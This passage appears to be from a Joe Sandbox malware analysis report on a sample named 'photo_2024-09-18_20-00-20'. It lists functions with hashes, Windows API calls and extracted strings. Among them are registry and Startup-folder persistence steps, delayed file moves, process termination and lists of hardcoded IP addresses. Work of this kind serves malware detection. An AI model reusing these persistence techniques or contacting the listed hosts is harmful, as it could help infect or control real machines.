                                                                • Opcode ID: 9e2ab4374a66237786eb8764cdaa3591b9d815212faac1f1b4de002376f579aa
                                                                • Instruction ID: ca287531272148182e2a4c1013a3c0c1369dd11ad5a7dfe37625cce3747b3fff
                                                                • Opcode Fuzzy Hash: 9e2ab4374a66237786eb8764cdaa3591b9d815212faac1f1b4de002376f579aa
                                                                • Instruction Fuzzy Hash: D4F1D275E042298FEB64CF28CC9079DB7B2FB49254F2581EAC84DA7245DB306E85CF91
                                                                Function 02470B11 Relevance: .1, Instructions: 87COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                • Instruction ID: 5eaf0fad8ccefaeffdfd336a59d2f7a6697d23ce906b13856063d39a2eae7b0e
                                                                • Opcode Fuzzy Hash: 9bb5c1b61b7b98cbc056ea8f67b9a8ca7ef086e949689a6f228cbbfb2ff37ba7
                                                                • Instruction Fuzzy Hash: 7D319C76A0974B8FC310DF98C480966B3E4FF89318B09196EE8A597312E334FA55CB91
                                                                Function 0247B904 Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction ID: ebe5151c00eee0ba3fd28fe3d7d65fa6229170cc7f24c79529174dcc452d3374
                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction Fuzzy Hash: 411123F724415243D6548A2ED8B42F7EB96EBC633CB2D937BD0B18B798E322E1459600
                                                                Function 1000B900 Relevance: .1, Instructions: 76COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction ID: 7803ec30f91b7029f58af8cd0b16b508c8908f2f84e137656bb773f65adef076
                                                                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                • Instruction Fuzzy Hash: 6F112B77640D8383F681CD2ED4B46ABE3DAEFC62E0B29437AD2824B65CD22299459600
                                                                Function 02476E41 Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
                                                                • Instruction ID: b47ecbc6d420c57055408b5562e1a68fe0858a734b61b56c29965993158c5ce7
                                                                • Opcode Fuzzy Hash: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
                                                                • Instruction Fuzzy Hash: AC21D5216B0EF206CB449BFCECC025727D18B8A11A35EC3A6EA70CE151C2BDD262C660
                                                                Function 10006E3D Relevance: .1, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
                                                                • Instruction ID: 54eee8e86585e5215b5803947df559b0e46e26245c461bafb14746debafb24c4
                                                                • Opcode Fuzzy Hash: a8223c184387945c1fb1f8b9d386c8107abf76b8eb19074b24e68793b24c2442
                                                                • Instruction Fuzzy Hash: 5F21A122AB0EF206D7449BF8ECC011727D1CB8E11636DC366EAA4CD061C1BDD622C660
                                                                Function 00409B33 Relevance: 93.1, APIs: 28, Strings: 25, Instructions: 320COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$H_prolog3__memmove
                                                                • String ID: (_$L_$S91$`_$d10$dx12$m23c$m2csm$m2dw$m2fhq$m2h16$m2k8$m2m18$m2mx$m2q7$m2sw$m2t2$m2v5$m2y1$mx2$p2csm$p2f1$p2m1$p3csmtw$xmx
                                                                • API String ID: 322611620-4108881998
                                                                • Opcode ID: c98f761567da8f1f90c7d627f411698a859eabdc0b9a68de27980069d5145f99
                                                                • Instruction ID: 2720ef89984b743f53db0be0a4da48be5f2bc4d38e22187f14cdfcfdf616d736
                                                                • Opcode Fuzzy Hash: c98f761567da8f1f90c7d627f411698a859eabdc0b9a68de27980069d5145f99
                                                                • Instruction Fuzzy Hash: DCA19A70A003049BDB08F7BA999155DA6EAAF8831CF60487FE505BB3D3DEBC1F449649
                                                                Function 10001144 Relevance: 58.1, APIs: 21, Strings: 12, Instructions: 338registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _wprintf.LIBCMT ref: 10001192
                                                                • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,100195D4,0000000A), ref: 100011B0
                                                                • RegCloseKey.ADVAPI32(?), ref: 100011C0
                                                                • _memset.LIBCMT ref: 100012B7
                                                                • RegCloseKey.ADVAPI32(?), ref: 100012EE
                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 100012FF
                                                                • _memset.LIBCMT ref: 10001318
                                                                • _sprintf.LIBCMT ref: 100013C3
                                                                • _memset.LIBCMT ref: 10001471
                                                                • RegCreateKeyExA.ADVAPI32(80000002,SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices,00000000,00000000,00000000,00020006,00000000,?,00000000), ref: 10001496
                                                                • _sprintf.LIBCMT ref: 100014B7
                                                                • RegSetValueExA.ADVAPI32(?,1001962C,00000000,00000001,?,?), ref: 100014E8
                                                                • _sprintf.LIBCMT ref: 10001509
                                                                • DefineDosDeviceA.KERNEL32(00000001,1001962C,?), ref: 1000151B
                                                                • _memset.LIBCMT ref: 1000154C
                                                                • _sprintf.LIBCMT ref: 10001566
                                                                • _memset.LIBCMT ref: 100015A7
                                                                • _memset.LIBCMT ref: 100015BE
                                                                • _memset.LIBCMT ref: 10001619
                                                                • _memset.LIBCMT ref: 1000162D
                                                                • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 1000165A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$_sprintf$CloseValue$CreateDefineDeviceFileFolderMovePathSpecial_wprintf
                                                                • String ID: %s\1.qwq1$%s\Mic$.qwq$1$QWQ\ShellEx\ContextMenuHandlers\{00021401-0000-0000-C000-000000000046}$SYSTEM\CurrentControlSet\Control\Session Manager\DOS Devices$[:\1.qwq1$art Me$grams$nu\Pro$ows\St$rosoft\Wind
                                                                • API String ID: 1177859221-1427731300
                                                                • Opcode ID: 51bb5aa22d2491b6dd34fae9c9a2db225520097f77955de722f6cb5533bc3d18
                                                                • Instruction ID: 5e77c6fea4325d479937a6c85de82ae530236ccce02044bcbca6b124a08d5227
                                                                • Opcode Fuzzy Hash: 51bb5aa22d2491b6dd34fae9c9a2db225520097f77955de722f6cb5533bc3d18
                                                                • Instruction Fuzzy Hash: 1BD17AB184126DAEEB22DF548C84FEAB7BDFB04380F4045E5E649AB105DB709F858F61
                                                                Function 00419A78 Relevance: 42.2, APIs: 8, Strings: 16, Instructions: 221COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CharNext_wcstoul$__fassign
                                                                • String ID: disabledimage$fadeeffect$focusedfont$focusedimage$focusedtextcolor$foreimage$hotbkcolor$hotfont$hotforeimage$hotimage$hottextcolor$normalimage$pushedfont$pushedimage$pushedtextcolor$true
                                                                • API String ID: 1906380183-2099870589
                                                                • Opcode ID: fd94ccd2be1124e15f9bf654fd45503619edd959f88a5e045795827c2da92015
                                                                • Instruction ID: 54e315aa631d0228f2b81d4b0087af79dbd5bfe6516b7315c5f3b2a88d20f583
                                                                • Opcode Fuzzy Hash: fd94ccd2be1124e15f9bf654fd45503619edd959f88a5e045795827c2da92015
                                                                • Instruction Fuzzy Hash: 7061F931148706AED718BB21ED52EEF33E8AF12B25F24481FF416990C0FB78A981575E
                                                                Function 00401B28 Relevance: 38.7, APIs: 5, Strings: 17, Instructions: 245COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00401B32
                                                                  • Part of subcall function 00401F0C: std::exception::exception.LIBCMT ref: 00401F28
                                                                  • Part of subcall function 00401F0C: __CxxThrowException@8.LIBCMT ref: 00401F3D
                                                                • _wcslen.LIBCMT ref: 00401BD5
                                                                • _wcslen.LIBCMT ref: 00401BED
                                                                  • Part of subcall function 00401741: _memmove.LIBCMT ref: 00401796
                                                                • _wcslen.LIBCMT ref: 00401C02
                                                                • _wcslen.LIBCMT ref: 00401C1A
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                  • Part of subcall function 00402042: __EH_prolog3_GS.LIBCMT ref: 00402049
                                                                  • Part of subcall function 004022ED: __EH_prolog3_catch.LIBCMT ref: 004022F4
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                Strings
                                                                • 111.48.62.98;111.48.62.3;111.48.62.27;111.48.62.18, xrefs: 00401C2C
                                                                • 3.3.3.3, xrefs: 00401C39
                                                                • x c, xrefs: 00401EA8
                                                                • 121.201.64.84;121.201.64.72;183.232.200.41;124.95.140.35;112.73.64.83;219.132.195.22, xrefs: 00401BFC, 00401C01
                                                                • 9.9.9.9, xrefs: 00401DBC
                                                                • 121.201.64.140;112.73.64.18;116.211.138.100;113.106.204.33, xrefs: 00401C14, 00401C19
                                                                • c, xrefs: 00401C64
                                                                • 2.2.2.2, xrefs: 00401CBE
                                                                • 122.190.108.143;122.190.108.135;113.57.219.169;113.57.219.167, xrefs: 00401CB1
                                                                • 1.1.1.1, xrefs: 00401D3D
                                                                • 61.142.132.87;124.95.140.121;183.232.9.33;47.88.79.111, xrefs: 00401BE7, 00401BEC
                                                                • 112.73.64.18;112.73.64.14;112.73.64.15;116.211.138.100;113.106.204.33;113.106.204.51;119.96.196.36, xrefs: 00401D30
                                                                • 121.201.64.140;112.73.64.18;116.211.138.100, xrefs: 00401E2E
                                                                • testnetwork.duoyi.com.dycdn.com, xrefs: 00401BCB, 00401BD0
                                                                • x c, xrefs: 00401B39
                                                                • 121.201.64.140;112.73.64.18;116.211.138.100;47.88.79.111, xrefs: 00401DAF
                                                                • 4.4.4.4, xrefs: 00401E3B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$H_prolog3__memmove$Exception@8H_prolog3_catchThrowstd::exception::exception
                                                                • String ID: 1.1.1.1$111.48.62.98;111.48.62.3;111.48.62.27;111.48.62.18$112.73.64.18;112.73.64.14;112.73.64.15;116.211.138.100;113.106.204.33;113.106.204.51;119.96.196.36$121.201.64.140;112.73.64.18;116.211.138.100$121.201.64.140;112.73.64.18;116.211.138.100;113.106.204.33$121.201.64.140;112.73.64.18;116.211.138.100;47.88.79.111$121.201.64.84;121.201.64.72;183.232.200.41;124.95.140.35;112.73.64.83;219.132.195.22$122.190.108.143;122.190.108.135;113.57.219.169;113.57.219.167$2.2.2.2$3.3.3.3$4.4.4.4$61.142.132.87;124.95.140.121;183.232.9.33;47.88.79.111$9.9.9.9$testnetwork.duoyi.com.dycdn.com$x c$x c$ c
                                                                • API String ID: 1267409529-3712342205
                                                                • Opcode ID: c7552501e3089848229e18aa4d3bacc16aff9e55bfdf31e4a09e997b163b6fcb
                                                                • Instruction ID: 09409d622da4cc2c820f64ad68a085b1ac4e798bad831718f44e4c714317aa3b
                                                                • Opcode Fuzzy Hash: c7552501e3089848229e18aa4d3bacc16aff9e55bfdf31e4a09e997b163b6fcb
                                                                • Instruction Fuzzy Hash: 1AA19471D012199EDB01EBA5DD92BCDBBB4AF04304F5080BEE604B72D2DBB81E49C7A5
                                                                Function 0040896E Relevance: 33.5, APIs: 10, Strings: 9, Instructions: 235COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 00408978
                                                                • _memset.LIBCMT ref: 004089D5
                                                                • PathAppendW.SHLWAPI(?,DuoyiLaucher.ini,?,?,?,?,?,?,?,000008CC,0040790C,00000001,00000001), ref: 00408A13
                                                                • WritePrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,TestInstallPath,?,?), ref: 00408A76
                                                                • WritePrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,InstallPath,?,?), ref: 00408AA6
                                                                • WritePrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,SouiInstallPath,?,?), ref: 00408ACB
                                                                • _wcslen.LIBCMT ref: 00408B51
                                                                • WritePrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,TestInstallPath,?,?), ref: 00408BB1
                                                                • WritePrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,InstallPath,?,?), ref: 00408BEC
                                                                • WritePrivateProfileStringW.KERNEL32(Duoyi.com-Launcher,SouiInstallPath,?,?), ref: 00408C1E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: PrivateProfileStringWrite$AppendH_prolog3_Path_memset_wcslen
                                                                • String ID: %s\%s$Duoyi.com-Launcher$DuoyiLaucher.ini$DuoyiLauncher.exe$InstallPath$SouiInstallPath$TestInstallPath$\DuoyiLaucher.ini$\DuoyiLauncher
                                                                • API String ID: 2652765857-3706677510
                                                                • Opcode ID: 3e919eb6aabc940fa848a09befcecfa96e31a8788d8d9ed724b0dc6d6dbae521
                                                                • Instruction ID: 6a90fdb40f597139ed1d0ca3e09b56b23c014e6cc3b18998f748653bb3168a88
                                                                • Opcode Fuzzy Hash: 3e919eb6aabc940fa848a09befcecfa96e31a8788d8d9ed724b0dc6d6dbae521
                                                                • Instruction Fuzzy Hash: 76A119719002189ADB20EB61CD86BEDB7F8BB00304F1484EAE58977191DE796F85CFD9
                                                                Function 024714B7 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 126registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _memset$_sprintf$DefineDeviceFileMoveValue
                                                                • String ID: %s\1.qwq1$.qwq$1$[:\S$tart$up\1
                                                                • API String ID: 3652080668-2429600194
                                                                • Opcode ID: d29957811017151cf8cd95f091e965804ff3521897e4660b24c4c9668579ed0b
                                                                • Instruction ID: 604ac0d0324c4033a9e6eb12a666847f433bf2859d3781cd2aa031dbf067790e
                                                                • Opcode Fuzzy Hash: d29957811017151cf8cd95f091e965804ff3521897e4660b24c4c9668579ed0b
                                                                • Instruction Fuzzy Hash: 79416DB194112DAFDB21EB649C88BEE77BDAF48300F0055F6D25DE7101DA308B888F61
                                                                Function 004497F0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 187processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,3D09168B,00000000,00000000,00000000), ref: 00449832
                                                                • Process32FirstW.KERNEL32(00000000,?), ref: 00449858
                                                                • CloseHandle.KERNEL32(00000000), ref: 00449863
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 0044987E
                                                                • __wcsicoll.LIBCMT ref: 004498A4
                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 004498C3
                                                                • InitializeCriticalSection.KERNEL32(00632228), ref: 00449903
                                                                • EnterCriticalSection.KERNEL32(00632228), ref: 00449938
                                                                • LeaveCriticalSection.KERNEL32(00632228), ref: 00449967
                                                                • InitializeCriticalSection.KERNEL32(006321FC), ref: 004499D9
                                                                • EnterCriticalSection.KERNEL32(006321FC), ref: 00449A15
                                                                • LeaveCriticalSection.KERNEL32(006321FC), ref: 00449A44
                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00449A7C
                                                                • CloseHandle.KERNEL32(00000000), ref: 00449A83
                                                                • Process32NextW.KERNEL32(00000000,?), ref: 00449AA1
                                                                • CloseHandle.KERNEL32(00000000), ref: 00449AB0
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CriticalSection$CloseHandleProcess32$EnterInitializeLeaveNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32__wcsicoll
                                                                • String ID: OpenProcess Error!$util\CommonUtils.cpp
                                                                • API String ID: 4041544283-1176634618
                                                                • Opcode ID: a5415c05968f9f99f88c69e6aa2b68668c6e7b379062e0fb4e39374306e583c1
                                                                • Instruction ID: 83cbd9650cbd7e830f9c2217e7e69c11d737f3137f4b7e8b8dcd0288e3f141bf
                                                                • Opcode Fuzzy Hash: a5415c05968f9f99f88c69e6aa2b68668c6e7b379062e0fb4e39374306e583c1
                                                                • Instruction Fuzzy Hash: C57123B0940306AFD720EF64EC49A5FBBB5FB45314F10025AE916A32A0D7798F44EBE5
                                                                Function 004103CF Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 125registryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004103D6
                                                                • GetModuleHandleW.KERNEL32(00000000,00000054,00408950), ref: 004103E2
                                                                • wsprintfW.USER32 ref: 00410402
                                                                  • Part of subcall function 004017BC: _wcslen.LIBCMT ref: 004017D5
                                                                  • Part of subcall function 00401560: _memmove.LIBCMT ref: 00401581
                                                                  • Part of subcall function 004019E2: _memmove.LIBCMT ref: 004019FE
                                                                • _memset.LIBCMT ref: 00410443
                                                                • RegisterClassW.USER32(?), ref: 00410463
                                                                • GetLastError.KERNEL32(?,00000001,00634648,about_protocol,about_protocol_default), ref: 00410470
                                                                  • Part of subcall function 0040D5DF: __EH_prolog3.LIBCMT ref: 0040D5E6
                                                                  • Part of subcall function 00402D76: __EH_prolog3.LIBCMT ref: 00402D7D
                                                                • CreateWindowExW.USER32(00000000,?,005FC63C,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,?,00000000), ref: 004104D5
                                                                • GetLastError.KERNEL32(?,00000001,00634648,about_protocol,about_protocol_default), ref: 004104E5
                                                                • UnregisterClassW.USER32(?,?), ref: 004104FA
                                                                • SetWindowLongW.USER32(00000000,000000EB,?), ref: 0041053A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ClassErrorH_prolog3LastWindow_memmove$CreateH_prolog3_HandleLongModuleRegisterUnregister_memset_wcslenwsprintf
                                                                • String ID: HFc$HFc$Updater\Updater.cpp$[UM]rcls %d:%d$[UM]regclass %d$[UM]unregclass %d$[UM]urcls %d:%d$_UPDATE_MODULE_HELPER_WINDOW_DUOYI%d
                                                                • API String ID: 4082617265-1093548344
                                                                • Opcode ID: e09dc9321968befc5a3007223d0e6257d99c71ef3da35ab10f1b87593dc41e24
                                                                • Instruction ID: 8f5ef990ad4defa66492d01b94fc226f91aa89c60b10d5951038218c98f4e7ae
